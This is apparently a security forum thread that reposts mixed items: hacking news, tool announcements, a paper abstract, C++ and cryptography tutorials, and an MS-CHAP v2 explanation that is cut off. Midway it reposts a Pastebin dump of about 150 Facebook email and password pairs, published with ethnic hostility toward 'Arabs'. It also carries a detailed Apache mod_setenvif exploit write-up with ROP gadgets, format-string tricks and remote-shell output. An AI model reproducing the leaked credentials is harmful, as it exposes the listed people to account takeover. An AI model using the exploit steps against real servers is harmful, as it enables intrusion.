Nytro

Self Claimed Hacker - Ankit Fadia Hacked by Young Hackers Again and Again ! A self proclaimed Indian Hacker, Ankit Fadia became a favorite target of young Indian Hackers the first week of 2012. In last week, Mr. FADIA got hacked two to three times by different young Indian hackers. Last week members of Teamgreyhat managed to breach the website of Mr.Fadia and today another Hacker, "Himanshu Sharma" with the code name “??¢???” hacked the same server on which Ankit's website was hosted. In this attack these hackers have successfully hacked into the Ankit Fadia's offcial site and exposed lots of credentials including sensitive data, student details, Database credentials (DB Name, User Name & Password) and many more. Not only was Ankit's website hacked, 2508 others sites hosted on same server also got hacked and their databases were also dumped by these young hackers. Ankit Fadia offers Ankit Fadia Certified Ethical Hacker (AFCEH) certificates to those who take his courses on ethical hacking, where he gives lectures on security tools, techniques and methods. Mr. Fadia also comes on national TV at MTV on a techie show called "What The Hack". Most of the time he claims that he will give a reward to anyone who will hack him (May be in order to promote himself as the most secured hacker). Well, there are 100's of Hackers who hacked Ankit Fadia after this award was announced! So, will Mr. Ankit gives these guys a reward or he will take legal action against them ? Last year Mr. Ankit was also hacked by Indian and Pakistani Hackers multiple times using various methods. After being hacked then, why has Mr. Fadia not fixed all vulnerabilities ? Is he not aware about all hacking methods ? Or may be he is not able to fix his own website? These Questions are being asked various AFCEH students, who got certification of Hacking from Mr. Fadia. Mr. Himanshu Sharma at the age of 17, has revealed vulnerabilities for many Fortune 500 companies. He has been listed in the “Hall of Fame” for companies like: Google, Microsoft, Facebook, Apple , Samsung, India TV,IIT Bombay Rediff, Mediafire, Dreamtemplate, TemplateMonster, Channel [V], Pizzahut, Kfc, BBC, Sony and Universities like Stanford University, Virginia University and More.. Why aren’t these young hackers getting any chance to grow ? Why are they not getting a chance to present their talent? Why aren’t they able to help the nation by working for security? Most obviously, these young hackers have much more talent than any other self claimed Hackers. Moreover, Himanshu and all these hackers want to challenge Mr. Fadia on national TV. Well we know that it's a big demand by kids, but they have guts to prove themselves. We have another interesting article on Pastebin, that contains reasonable truth about all his claims. Read here and here and justify this for yourself. Sursa: Self Claimed Hacker - Ankit Fadia Hacked by Young Hackers Again and Again ! | The Hacker News (THN)

Hashcat - GUI [h=3]Additional requirements:[/h] Windows users require Microsoft visual C++ redistributable package [h=2]Features[/h] Supports all platforms used by hashcat (CPU, OpenCL, CUDA) Supports all hashcat implementations (hashcat, oclHashcat-plus, oclHashcat-lite) Free Multi-OS (Linux & Windows native binaries) Multi-Platform (32-bit & 64-bit) ... and much more [h=2]Hashcat-GUI Screenshot Windows[/h] [h=2]Hashcat-GUI Screenshot Linux[/h] [h=2]Tested OS[/h] All Windows and Linux versions should work on both 32 and 64 bit Download: http://hashcat.net/files/download.php?proj=hashcat-gui Sursa: hashcat-gui - advanced password recovery

Comprehensive Experimental Analyses of Automotive Attack Surfaces Stephen Checkoway, Damon McCoy, Brian Kantor, Danny Anderson, Hovav Shacham, and Stefan Savage University of California, San Diego Karl Koscher, Alexei Czeskis, Franziska Roesner, and Tadayoshi Kohno University of Washington Abstract Modern automobiles are pervasively computerized, and hence potentially vulnerable to attack. However, while previous research has shown that the internal networks within some modern cars are insecure, the associated threat model—requiring prior physical access—has justifiably been viewed as unrealistic. Thus, it remains an open question if automobiles can also be susceptible to remote compromise. Our work seeks to put this question to rest by systematically analyzing the external attack surface of a modern automobile. We discover that remote exploitation is feasible via a broad range of attack vectors (including mechanics tools, CD players, Bluetooth and cellular radio), and further, that wireless communications channels allow long distance vehicle control, location tracking, in-cabin audio exfiltration and theft. Finally, we discuss the structural characteristics of the automotive ecosystem that give rise to such problems and highlight the practical challenges in mitigating them. Download: http://www.autosec.org/pubs/cars-usenixsec2011.pdf

[h=2]C++ Rvalue References Explained[/h]By Thomas Becker Last updated: September 2011 [h=3]Contents[/h] Introduction Move Semantics Rvalue References Forcing Move Semantics Is an Rvalue Reference an Rvalue? Move Semantics and Compiler Optimizations Perfect Forwarding: The Problem Perfect Forwarding: The Solution Rvalue References and Exceptions The Case of the Implicit Move Acknowledgments and Further Reading [h=4]Introduction[/h] Rvalue references are a feature of C++ that was added with the C++11 standard. Rvalue references are elusive. I have personally overheard several people with very, very big names in the C++ community say these things: "Everytime I think I have grasped rvalue references, they evade me again." "Oh those rvalue references. I'm having a real hard time wrapping my head around that." "I dread having to teach rvalue references." The nasty thing about rvalue references is that when you look at them, it is not at all clear what their purpose might be or what problems they might solve. Therefore, I will not jump right in and explain what rvalue references are. A better approach is to start with the problems that are to be solved, and then show how rvalue references provide the solution. That way, the definition of rvalue references will appear plausible and natural to you. Rvalue references solve at least two problems: Implementing move semantics Perfect forwarding If you are not familiar with these problems, do not worry. Both of them will be explained in detail below. We'll start with move semantics. But before we're ready to go, I need to remind you of what lvalues and rvalues are in C++. Giving a rigorous definition is surprisingly difficult, but the explanation below is good enough for the purpose at hand. The original definition of lvalues and rvalues from the earliest days of C is as follows: An lvalue is an expression e that may appear on the left or on the right hand side of an assignment, whereas an rvalue is an expression that can only appear on the right hand side of an assignment. For example, int a = 42; int b = 43; // a and b are both l-values: a = b; // ok b = a; // ok a = a * b; // ok // a * b is an rvalue: int c = a * b; // ok, rvalue on right hand side of assignment a * b = 42; // error, rvalue on left hand side of assignment In C++, this is still useful as a first, intuitive approach to lvalues and rvalues. However, C++ with its user-defined types has introduced some subtleties regarding modifiability and assignability that cause this definition to be incorrect. There is no need for us to go further into this. Here is an alternate definition which, although it can still be argued with, will put you in a position to tackle rvalue references: An lvalue is an expression that refers to a memory location and allows us to take the address of that memory location via the & operator. An rvalue is an expression that is not an lvalue. Examples are: // lvalues: // int i = 42; i = 43; // ok, i is an lvalue int* p = &i; // ok, i is an lvalue int& foo(); foo() = 42; // ok, foo() is an lvalue int* p1 = &foo(); // ok, foo() is an lvalue // rvalues: // int foobar(); int j = 0; j = foobar(); // ok, foobar() is an rvalue int* p2 = &foobar(); // error, cannot take the address of an rvalue j = 42; // ok, 42 is an rvalue If you are interested in a rigorous definition of rvalues and lvalues, a good place to start is Mikael Kilpeläinen's ACCU article on the subject. Sursa: C++ Rvalue References Explained

Fresh arab Facebook user's + password's By: Inject | Jan 14th, 2012 Hello, I am an Israeli hacker, and I intend to publish a list of Facebook users and passwords of Arabs To show that we are The Israelis can do more than the Arab peoples. I have lists of many site's. When this war starts i will publish all of my lists. ______________________________________________________________________________________________ Facebook users and passwords saleem.shazad@yahoo.com - 123456789 aslamparwez@yahoo.com - d3bviwmp asmalik_architect@yahoo.com - asdqwe dr.tension@hotmail.com - byb926qc1 forchiniot123@yahoo.com - begoodyou gallent_120@yahoo.com - jahangir ghazanfarsher1@gmail.com - pakistan haseeb.ahmed.siddiqui@gmail.com - mintoamber imran4t88@gmail.com - 20031989 jvdhdr@yahoo.com - 412667895 kamran_rafiq80@hotmail.com - ptjn01 khan_75120@yahoo.com - musakhan kiani.1212@yahoo.com - nomi225888 Leo8826@gmail.com - realking librawah@yahoo.com - hotlove LOVE2U4NOTHING@GMAIL.COM - KHAN0786 lucky4u_762@yahoo.com - godooo lyca205@yahoo.com - jihadi maya_kanwal1@yahoo.com - aassdd mazharhussain34@gmail.com - mmzhr439712 md_shahzaib@yahoo.com - 6663819 medstu2005-2010@hotmail.com - panaxgensing mehdihassan_zaidi@yahoo.com - s4u03002118090 mehmood@enaan.com - karachik mehmoodahmd@gmail.com - mobilink mian0321@yahoo.com - 2637997 michael.jhonson@ymail.com - 5021368 mirshazadumer@gmail.com - muzafer.283 mkhitran99@yahoo.com - nabeel99\ mks_attari92@hotmail.com - 6692201 mmuraadkhan@yahoo.com - 6473509 mohdraza1@hotmail.com - haqhoo mohsin61115@yahoo.com - 7151386 momink@hotmail.com - mr431718 montaz42@yahoo.com - 871957 moon_afridi@yahoo.com - 123456 mrasifgold@gmail.com - asif1234 MrizwanT20@yahoo.com - Mtankdik ms-zindgee2707@yahoo.com - 270707 msabir279@hotmail.com - experts msameer85@hotmail.com - reemas123 msrhmankhan@hotmail.com - 55667788 mubasherkaleem@ymail.com - 786555687 mudasar.ali98@yahoo.com - doctor98 muhammad.abdulraouf@yahoo.com - 3334952302 muhammadfaizan30@hotmail.com - 79727972 Muhammad_Bilal26@yahoo.com - 123456 mujtabaccs@hotmail.com - pakistan mumtazjournalist@gmail.com - 03215473472 mumtazzaidi@live.com - assa32 muneebk4@gmail.com - makl04041967 Muzammil63@hotmail.Com - 4322450 my_deep_heart001@yahoo.com - aassdd m_iimran@hotmail.com - 1366998136 m_khalid21@yahoo.com - mk2002 nadeem_lhr4u@yahoo.com - 412967123 Naeemrai@rocketmail.Com - 6228849 naeemuddin31@gmail.com - 0216330663 naima.khan237@yahoo.com - ptclptcl nanoo_ji@yahoo.com - wasimahmad nasirattari786@hotmail.com - 123786 nasirnnt2005@hotmail.com - 5496568 nawazmalhi@yahoo.com - malhiji nidamardan@yahoo.com - sakhan nisargullali@yahoo.com - 111111 nooreesultan@ymail.com - 337.?s pakindia00@yahoo.com - 786786 phoolnawaz@yahoo.com - pakistan pioneer5844462@hotmail.com - windycity prince_sunny143@hotmail.com - malik1980 printo_doon@hotmail.com - pakistani qadir_sky1@yahoo.com - aassdd rabeetsh@yahoo.com - 582022 raja_sahil50@yahoo.com - 3630663 ramzan_4646@in.com - 4646045 ranajoni253@yahoo.com - 661507 RASHIDMALIK420@YAHOO.COM - JANG123 ratifimran@yahoo.com - bhaijani rehmat_wadaykhel@yahoo.com - kaleemullah rnasim73@yahoo.com - loc1334 s.fanfactory@gmail.com - 15141526 saaawan@yahoo.com - 03215123486 saazam2003@hotmail.com - mughalpura sabzawary@yahoo.com - shahzia saddabahar@yahoo.com - Sumaniloveyou sadiamajeed50@yahoo.com - lifeme sahil_haider_me@yahoo.com - ibmg74 SAIMA_KHAN42030@YAHOO.COM - 2272970 sajidahmed86@yahoo.com - aloneboy sajid_712@yahoo.com - ansari sajjalnoor@yahoo.com - abcdef saleem.shazad@yahoo.com - 123456789 salman_08_khan@yahoo.com - dharam samycool10@hotmail.com - jivepakistan sardarharis98@yahoo.com - 123456789 sarfraz_444@yahoo.com - 268097 sarmadlighari@yahoo.com - samsung SBAA@YAHOO.COM. - MISBAH SBAA@YAHOO.COM - misbah shadsial786@yahoo.com - 7372699 shafiq_dadly@yahoo.com - pakistan shafeeqars@yahoo.com - naseem shaheenakhtar91@yahoo.com - 7762282 shahid6501@gmail.com - humtum shahid849@hotmail.com - spa1969 shahidhameed20@yahoo.com - 967450 s_khan_123@yahoo.com - 6730143 tahirullahkhan@gmail.com - xkuzmpls tahir_sahil2006@yahoo.com - lahore1983 tahrieemb@yahoo.com - 03004589743 tamojananis@hotmail.com - 860086 tania_bano123@yahoo.com - 898989 tanveersajid23@yahoo.com - 5635044 tanzilmunir@yahoo.com - azao0102 tariqaftab.ptcl@hotmail.com - 08550855 tariqshahzad_124@yahoo.com - 123456 tariq_jamalli@yahoo.com - jamali65 terminator_bug2005@yahoo.com - bal12266 Theifof_heart@yahoo.com - 7737177 tippu_656@yahoo.com - Lahore7284507 toobi_a@yahoo.com - nafram tsn_345@yahoo.com - bindas treen24@yahoo.com - 841365 Uetian.78@gmail.Com - adgjmp ul13@ymail.com - izharlovedjhero umar_eagle@yahoo.com - attitude47 usama137@gmail.com - 03346796918 waheed_malik31@yahoo.com - ghazal wajid9419@yahoo.com - 6137634 waqar702@gmail.com - 786786 wasimabbaschanna@yahoo.com - 0217722271 wasi_wasi2002@yahoo.com - 03006886087 weyalkh@gmail.com - weyalkh12 www.ch.moazzam-phambra@hotmail.com - barnala www.dilg11@yahoo.com - love2life www.mshoaibarshad@yahoo.com - spiderman www.shakeel_shehzad786@yahoo.com - 123456 yamaan@yahoo.com - muhammadyamaan YAQUB_USAMA@YAHOO.COM - 0543430741 ymahmood71@gmail.com - national yourtrulywellwisher@yahoo.com - 1234567 zafarnadvi@gmail.com - 26011976 zahimgelani@yahoo.com - computer zahoorellahi336@gmail.com - 31193366 Zainqurishi@gmail.com - 2512005 zain_ul_abedeen11@yahoo.com - 4569178 zee4zaara@yahoo.com - drrahul ZEESHANAZ@hotmail.COM - TBJJKA ZEESHANAZ@MSN.COM - TBJJKA zirva_luv_4u@yahoo.com - 786786786 Sursa: Fresh arab Facebook user's + password's - Pastebin.com

Apache Mod SetEnvIf IntegerOverflow - DemoExploit Starting Point During routine testing, an integer overflow in apache2-mpm-worker 2.2.19 mod-setenvif was found. The crash occured when mangling request headers using a crafted .htaccess-file. The broken code was ap_pregsub in server/util.c, where the buffer size of a new header field could overflow, the value was then used for memory allocation. When copying data to the buffer an, overwrite of the an apr (apache portable runtime) memory-pool boundaries occured, similar to standard heap buffer overflows. Outline of Exploit The main goals creating the exploit were: Exploit has to be triggerable via HTTP GET requests only Exploit data has to be 0-byte free to have valid HTTP-protocol No alternative way of heap-spraying is used, e.g. GET + content-length. All variants I knew of had much too low efficiency Use libc for ROP, although all libc-addresses start with 0-byte, which cannot be sent via HTTP Rely only on libc address guess, but not heap/stack address guess, unless guess could be made nearly 100% reliable Use the already open HTTP-connections and turn them into command connections on the fly Have exploit in less than 256 bytes Two different exploit layouts were developed. The first one used multiple threads, so that one was overwriting the data of the second thread before hitting the end of the memory area. Precise timing was essential to get shell access. The second one used a more crafted substitution expression, stopping the copy in a single thread by modifying the regular expression currently processed in the thread. Since there is race condition involved, this exploit was far more reliable than the first one. First Exploitation Attempt Due to the afore-mentioned requirements, an exploit with about 30% success rate for apache2-mpm-worker 2.2.19 on ubuntu oneiric 32bit was developed with the purpose to learn alternative programming techniques in a hands-on approach. To get hold of crucial apache data structures, the programs outlined here tried to exploit concurrent access to already corrupted data structures before the otherwise inevitable apache crash. Due to the additional Step 0: Create an .htaccess-file that will copy more than 4GB of data into a 16MB buffer. Usually ap_pregsub will copy data to the buffer, overwriting the whole apr-pool memory until copy hits the upper mapped memory boundary (see second while-loop in ap_pregsub from server/util.c). Since the .htaccess will cause ap_pregsub to fill the whole heap with repeating copies of the HTTP-header block, this will also circumvent the heap randomization. The heap data will span such a large portion of heap, so that a pointer to heap will always hit one of the copies. Step 1: To get a chance to execute code, ap_pregsub copy process has to be stopped without SEGV. Two ways are possible: The copy process also overwrites the regular expression, that is defining which data is currently copied. By overwriting the expression with a stop sequence ($9$9..), execution will leave ap_pregsub function without SEGV, but will continue using the corrupted heap. Since there is no function pointer call near, most of the execution branches will lead to crash. Just one path allows to construct an endless loop loop in apr_palloc. Terminate the overwriting process before it reaches the end using another apache thread and the already corrupted heap. Since data copy is quite fast, the race between the two apache threads is very hard to make. To extend the window of opportunity, an ap_pregsub-stop sequence is sent first using SendTrigger-SingleThreadAprPallocEndlessLoop.c. This will add a 16MB race buffer, slow down the server by sending one thread into endless loop, both helps to extend the race window in step 3 to 100ms on a 800MHz CPU, which would also be sufficient for remote TCP exploitation. Step 2: Send traffic, that will make apache use one function pointer more frequently. For reproducibility it was important, to send data, that will make apache loop just over a very limited part of the whole apache binary code. Otherwise a wide variety of crashes at different code positions were observed. The RequestFlood.c program will open multiple connections to apache, send GET /AAA and then continue to send AAAA every 100ms, thus making the URL data on server side longer in each iteration. Due to the long time between the sending of GET header bytes, it is quite likely, that the heap is overwritten by thread started in step 3 while the current thread is in apr_socket_timeout_set (srclib/apr/network_io/unix/sockopt.c). apr_socket_timeout_set has also one other advantage, it will pick up the sock pointer from corrupted heap and write the timeout value to that location, thus giving the opportunity to write the first MSB 0-byte and using that value as function pointer later on in ap_get_brigade from server/util_filter.c. The RequestFlood program has to be running before sending the remote shell trigger in step 3. Step 3: Send a trigger request, that will overwrite the apr-heap, similar to the request from step 1, but without any stop sequence. The HTTP request data will be overwrite the heap, thus the threads from step 2 can pick it up. This request contains also the remote shell code, but there are a few obstacles blocking code execution: Stack is not overwritten at all, so standard ROP cannot work Heap is overwritten with 0-byte free data, but ROP usually needs quite a few 0-bytes. This makes it impossible to use any test xxx; jz yyyy; branches or use small positive array indices. Heap is not executable Workarounds for these problems are collected in SendTrigger-RemoteShell.c: No stack control: Jump to sscanf in a way, so that sscanf will overwrite some values on stack, including a return address. This is made easier since sscanf has an integer overflow when parsing the offsets for argument skipping syntax. Hence it is possible, to access values above and below the current stack position using offsets near 2^30, as seen in the scan string %1073741815$32c%3s%4hx%1x%1x%1073741815$7s. sscanf was used to add some 0-bytes on heap also. No full stack control: sscanf stack editing is painful and eats up a lot of payload space. So use the return address to jump to pop esp; ret to have stack pointing to heap. Non-executable heap: Jump to mprotect and make heap executable Avoid back-connect: Loop over open file descriptors and fork a shell for every descriptor. See ForkPayload.c for assembly code. The code uses the return address from mprotect to calculate dup2, fork, execv addresses, thus avoiding need for some more 0-bytes. The whole remote shell loop code is just 93 bytes. The trigger program takes the libc start address as argument. If it is possible to place a symbolic link to /proc/self/maps on the host, simple renaming of the link will defeat the NoFollowSymlinks options and allow to read the offsets from /proc/self/maps, thus defeating the ASLR ( more). If not known, address has to be guessed using different values in SendTrigger-RemoteShell --LibcMapPos 0xxxxxx. Step 4: To reduce the code size, the remote command connection does not return stdout. To get stdout, the first command sent to remote should be exec 1>&0. Since SendTrigger-RemoteShell.c does not implement a nice shell gui, one can also telnet to apache before starting step 3, the telnet connection will turn to remote shell connection while open. Second Exploitation Attempt In contrast to the first attempt, this exploit overwrites the currently interpreted regex with a crafted stop sequence to terminate buffer overwriting before reaching the upper heap limit. In contrast to the first attempt, this program requires only a single apache thread to give remote shell and could also be used to take over process on non-mpm-worker apache servers. Steps: Step 0: Create an .htaccess-file in /var/www, that will copy more than 4GB of data into a 16MB buffer. The new variable value expression is designed in such way, that when apache is copying data to the destination buffer and overwriting the variable definition data itself, the new definition corresponds to a variable size of zero. Hence the buffer-overflowing copy process is stopped as soon as the variable definition data is overwritten. Step 1: Mix up heap data to get a layout favorable to our tasks. This can be done by just sending a normal GET request for an existing file via a Keep-Alive connection and using that connection to send the trigger afterwards. Step 2: The most stable server code/data flow leading to successful exploitation would be one using a function pointer near to the point where the overflow begun. Otherwise the exploit code will depend also on other modules loaded or platform configuration parameters (the first attempt used a function pointer after mod_setenvif processing was completed). To archive that, apr_table_setn is used. The function usually would store the new variable value to a hash-table. Since it is operating on an overwritten table data structure, it can be used to create 0-bytes at appropriate locations and finally trigger an invalid allocation. Thus is leading to apr_palloc to call an abort-function and this function pointer can be controlled. At the moment of this function call, only the function destination can be controlled, the content of all other registers cannot be used to call a suitable target function directly. Since the stack was not overwritten, standard ROP methods do not work. As a workaround, a part of the _IO_file_seekoff function can be used: 0x00736ff7 <_IO_file_seekoff+407>: mov 0x8(%ebp),%ecx 0x00736ffa <_IO_file_seekoff+410>: mov 0x14(%ebp),%edx 0x00736ffd <_IO_file_seekoff+413>: mov 0x4c(%ecx),%eax 0x00737000 <_IO_file_seekoff+416>: mov %esi,0x4(%esp) 0x00737004 <_IO_file_seekoff+420>: mov %edx,0xc(%esp) 0x00737008 <_IO_file_seekoff+424>: mov %edi,0x8(%esp) 0x0073700c <_IO_file_seekoff+428>: mov %ecx,(%esp) 0x0073700f <_IO_file_seekoff+431>: call *0x40(%eax) At the end of the sequence the stack will contain one pointer of our choice, the value 1 and the call will go to a controllable destination. That stack layout matches the function call of __libc_dlopen_mode, the internal symbol for dlload(). A sample program to archive this is TriggerRemoteShell.c. Step 2: Since the attack assumed, that an attacker could place an .htaccess file on the server, it is also sensible to assume, that he could put a second file there also. This second file should be a shared library loaded by the dlload call. The library contains the _init symbol, this function is called during loading of the library, hence activating the exploit code. The library itself is not very special, it just tries to identify all open socket connections using a getsockopts call and forks a shell for every connection, e.g. ExploitLib.c. When the library is loaded, the open connection of TriggerRemoteShell.c is turned to a remote shell. Since apache server on ubuntu oneiric uses ASLR and the exploit needs the correct libc memory locations, the TriggerRemoteShell program can be started with the correct libc mapping information for testing. In real world examples, one might guess or try to get access to the /proc/[pid]/maps file before sending the exploit using an apache symlink timerace. buildhost-ubuntuoneiric1110:~$ ./TriggerRemoteShell --LibcMapPos 0x6e5000 Using libc map pos at 0x6e5000 Opening ... HTTP/1.1 200 OK Date: Thu, 22 Dec 2011 08:56:36 GMT Server: Apache/2.2.20 (Ubuntu) Last-Modified: Sun, 20 Nov 2011 22:55:18 GMT ETag: "1b76-4-4b23276d097f8" Accept-Ranges: bytes Content-Length: 4 Vary: Accept-Encoding Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain AAAA Linux buildhost-ubuntuoneiric1110 3.0.0-12-generic #20-Ubuntu SMP Fri Oct 7 14:50:42 UTC 2011 i686 athlon i386 GNU/Linux /usr/sbin/apache2 -k start: Completed: not found sh: turning off NDELAY mode ls bin boot dev ... With a different payload library, the lower-privileged www-data process can modify the shared memory scoreboard data in a way to trigger an invalid free/gcc-lib load in the root-priv master process, see ApacheScoreboardInvalidFreeOnShutdown. Thinking About Security Due to my limited programming skills, getting this first and far-from-good POC exploit was not quite easy. Some apache, libc, linux software design decisions made it simpler or easier for me: apache: Common use of function pointers in apache. Function pointers allow implementation of apache as a flexible, modularized web server, but simplify arbitrary code execution. apache: Parts of the apache code have no checks on reasonable sizes or return values, hence allowing abnormally large data structures, e.g. for heap spraying or to cause resource starvation. apache: apr_palloc is quite fast but uses very simple data structure. Once one apr_memnode_t structure is under control, apr_palloc can be used to introduce 0-bytes when first_avail is incremented by a known value, which was the only other way besides apr_socket_timeout_set to add 0-bytes All lib-addresses start with 0-byte: The whole POC would be much smaller, if library addresses did not contain 0-bytes. This advantage is only relevant for small applications, where all libraries and modules fit into the lower 16MB libc: sscanf accepts negative arg pointer offsets in arg skipping syntax, thus allowing to use stack addresses before and after current stack position. What is that feature good for? linux: No stack-start randomization on byte granularity, allowing sscanf stack editing by modifying only the lowest byte of an address linux: mprotect syscall does not force unused protection mode flag bits to be 0, making it quite possible, that during ROP a stack value has the right bits set (x executable). Last modified 20120111 Contact e-mail: me halfdog.net Sursa: Exploitation of Integer Overflow in Apache 2.2.19 mod-setenvif

[h=2]ShellDetect v1.0 – New Shell Code Detection Tool[/h] [TABLE] [TR] [TD=class: page_subheader]About Shell Detect [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] Shell Detect is the FREE tool to detect presence of Shell Code within a file or network stream. You can either provide raw binary file (such as generated from Metasploit [Reference 4]) or network stream file as input to this tool. These days attackers distribute malicious files which contains hidden exploit shell code. On opening such files, exploit shell code get executed silently, leading to complete compromise of your system . This is more dangerous when the exploit is 'Zero Day' as it will not be detected by traditional signature based Anti-virus solutions. In such cases ShellDetect may help you to identify presence of shell code (as long as it is in raw format) and help you to keep your system safe.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]We recommend running this tool in Virtual Environment (using VMWare, VirtualBox [Reference 2,3]) as it may cause security issues on your system if the input file is malicious. Currently ShellDetect tool is in experimentation stage and works on Windows XP (with SP2, SP3) only.[/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: page_subheader]Screenshots [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Here is the screenshot of ShellDetect detecting shell code in raw file as well as network stream file. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [/TABLE] [TABLE] [TR] [TD=class: page_subheader]Download[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [TABLE=width: 95%, align: center] [TR] [TD] FREE Download ShellDetect 1.0 License : Freeware Platform : Windows XP Download [/TD] [TD=align: center] [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [/TABLE] Sursa: ShellDetect : Shell Code Detector Tool

WebSSO by Mayuresh on January 15, 2012 We featured Vulture WebSSO in our List of Open Source Web Application Firewalls! It has since been updated. We now have Vulture WebSSO version 2.0.2! Vulture is a Web-SSO solution based on technology reverse proxy implemented on a base Apache 2.2. Vulture WebSSO also provides application firewall functionality and interfaces between Web applications and Internet to provide unified security and authentication. The main features are: The authentication of users with many methods supported: LDAP, SQL, text file, radius server, digital certificates … Modular design allows you to add new authentication methods The spread of authentication on protected applications [*]The encryption flow [*]Filtering and content rewriting [*]Some features to protect against injection attacks [*]Load balancing [h=3]Download Vulture WebSSO 2.0.1:[/h]Vulture WebSSO 2.0.2 – vulture_2.0.2.tar.gz/vulture_2.0.2_amd64.deb/vulture-2.0.2-94.1.i386.rpm – Downloads - vulture - Open Source Reverse Proxy / Web Application Firewall - Google Project Hosting Sursa: Vulture WebSSO version 2.0.2! — PenTestIT

[h=1]An Overview of Cryptography [/h][h=3]Gary C. Kessler 27 December 2011[/h] [h=4]A much shorter, edited version of this paper appears in the 1999 Edition of Handbook on Local Area Networks, published by Auerbach in September 1998. Since that time, this paper has taken on a life of its own...[/h] [h=3]CONTENTS[/h] 1. INTRODUCTION 2. THE PURPOSE OF CRYPTOGRAPHY 3. TYPES OF CRYPTOGRAPHIC ALGORITHMS 3.1. Secret Key Cryptography 3.2. Public-Key Cryptography 3.3. Hash Functions 3.4. Why Three Encryption Techniques? 3.5. The Significance of Key Length 4. TRUST MODELS 4.1. PGP Web of Trust 4.2. Kerberos 4.3. Public Key Certificates and Certification Authorities 4.4. Summary 5. CRYPTOGRAPHIC ALGORITHMS IN ACTION 5.1. Password Protection 5.2. Some of the Finer Details of Diffie-Hellman Key Exchange 5.3. Some of the Finer Details of RSA Public-Key Cryptography 5.4. Some of the Finer Details of DES, Breaking DES, and DES Variants 5.5. Pretty Good Privacy (PGP) 5.6. IP Security (IPsec) Protocol 5.7. The SSL "Family" of Secure Transaction Protocols for the World Wide Web 5.8. Elliptic Curve Cryptography 5.9. The Advanced Encryption Standard and Rijndael 5.10. Cisco's Stream Cipher 5.11. TrueCrypt 6. CONCLUSION... OF SORTS 7. REFERENCES AND FURTHER READING A. SOME MATH NOTES A.1. The Exclusive-OR (XOR) Function A.2. The modulo Function ABOUT THE AUTHOR [h=3]1. INTRODUCTION[/h] Does increased security provide comfort to paranoid people? Or does security provide some very basic protections that we are naive to believe that we don't need? During this time when the Internet provides essential communication between tens of millions of people and is being increasingly used as a tool for commerce, security becomes a tremendously important issue to deal with. There are many aspects to security and many applications, ranging from secure commerce and payments to private communications and protecting passwords. One essential aspect for secure communications is that of cryptography, which is the focus of this chapter. But it is important to note that while cryptography is necessary for secure communications, it is not by itself sufficient. The reader is advised, then, that the topics covered in this chapter only describe the first of many steps necessary for better security in any number of situations. This paper has two major purposes. The first is to define some of the terms and concepts behind basic cryptographic methods, and to offer a way to compare the myriad cryptographic schemes in use today. The second is to provide some real examples of cryptography in use today. I would like to say at the outset that this paper is very focused on terms, concepts, and schemes in current use and is not a treatise of the whole field. No mention is made here about pre-computerized crypto schemes, the difference between a substitution and transposition cipher, cryptanalysis, or other history. Interested readers should check out some of the books in the bibliography below for this detailed — and interesting! — background information. [h=3]2. THE PURPOSE OF CRYPTOGRAPHY[/h] Cryptography is the science of writing in secret code and is an ancient art; the first documented use of cryptography in writing dates back to circa 1900 B.C. when an Egyptian scribe used non-standard hieroglyphs in an inscription. Some experts argue that cryptography appeared spontaneously sometime after writing was invented, with applications ranging from diplomatic missives to war-time battle plans. It is no surprise, then, that new forms of cryptography came soon after the widespread development of computer communications. In data and telecommunications, cryptography is necessary when communicating over any untrusted medium, which includes just about any network, particularly the Internet. Within the context of any application-to-application communication, there are some specific security requirements, including: Authentication: The process of proving one's identity. (The primary forms of host-to-host authentication on the Internet today are name-based or address-based, both of which are notoriously weak.) Privacy/confidentiality: Ensuring that no one can read the message except the intended receiver. Integrity: Assuring the receiver that the received message has not been altered in any way from the original. Non-repudiation: A mechanism to prove that the sender really sent this message. Cryptography, then, not only protects data from theft or alteration, but can also be used for user authentication. There are, in general, three types of cryptographic schemes typically used to accomplish these goals: secret key (or symmetric) cryptography, public-key (or asymmetric) cryptography, and hash functions, each of which is described below. In all cases, the initial unencrypted data is referred to as plaintext. It is encrypted into ciphertext, which will in turn (usually) be decrypted into usable plaintext. In many of the descriptions below, two communicating parties will be referred to as Alice and Bob; this is the common nomenclature in the crypto field and literature to make it easier to identify the communicating parties. If there is a third or fourth party to the communication, they will be referred to as Carol and Dave. Mallory is a malicious party, Eve is an eavesdropper, and Trent is a trusted third party. Tutorial complet: http://www.garykessler.net/library/crypto.html

MS-CHAP v2 MS-CHAP v2 is a one-way encrypted password, two-way authentication process that provides mutual authentication between peers (see Figure 1). It differs from MS-CHAP-V1 because it piggybacks an additional peer challenge (PCS) on the Response packet and an additional authenticator response on the Success packet. Both the authenticating server and the client challenge and authenticate each other. The message flow is as follows: Authenticator sends a challenge consisting of a Session ID and random authenticator challenge string (ACS). Client (peer) sends a response containing an encrypted one-way hash of the session ID, username, a peer challenge string (PCS), the peer response (PR), and the user password (secret). Authenticator responds with another one-way hash (based on the client response) of a success/failure code, the authenticator response (AR), and the user’s password (secret). The peer verifies the authenticator response and begins communications if the response is successful. It disconnects on failure. Figure 1: MS-CHAP-V2 This authentication method depends upon a secret (password) known only to the authenticator and the peer. The secret is not sent over the link. A one-way hash function, also known as a message digest, is a mathematical function that takes a variable-length input string and converts it into a fixed-length binary sequence that is computationally difficult to invert—that is, generate the original string from the hash. [h=5]CHAP and MS-CHAP[/h] CHAP was defined in RFC1994: PPP Challenge Handshake Authentication Protocol. CHAP (Challenge-Handshake Authentication Protocol) was initially used to verify client identity on PPP links using a three-way handshake. The handshake begins with the authenticator issuing a challenge to the client. The client responds with a digest calculated using a hashing function. The authenticator then verifies the response and acknowledges the connection if the match is successful, otherwise it terminates the connection. CHAP depends upon a secret known only to the authenticator and the client. The secret is not sent over the link. MS-CHAP differs from CHAP in that MS-CHAP does not require that the shared secret be stored in cleartext at both ends of the link. The Microsoft client knows the hash method used by the server so it can reproduce it, effectively creating a “matching” password on both ends. The client proves its identity based 